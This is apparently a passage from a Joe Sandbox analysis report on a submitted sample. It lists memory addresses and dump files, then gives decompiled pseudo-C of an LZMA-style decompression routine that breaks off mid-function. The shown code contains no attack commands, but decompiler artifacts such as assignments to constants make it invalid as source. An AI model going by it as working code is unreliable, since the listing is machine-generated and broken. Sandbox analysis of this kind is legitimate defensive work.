                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000
                                                          0x0040691e
                                                          0x0040676b
                                                          0x004066f2
                                                          0x004066ef
                                                          0x00000000
                                                          0x00406444

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                                                          • Instruction ID: e3f6d56364c83544c85f79d99d02007aa6d07438f45ea059adc5b55077a757f2
                                                          • Opcode Fuzzy Hash: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                                                          • Instruction Fuzzy Hash: 30714671D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040638C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E0040638C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
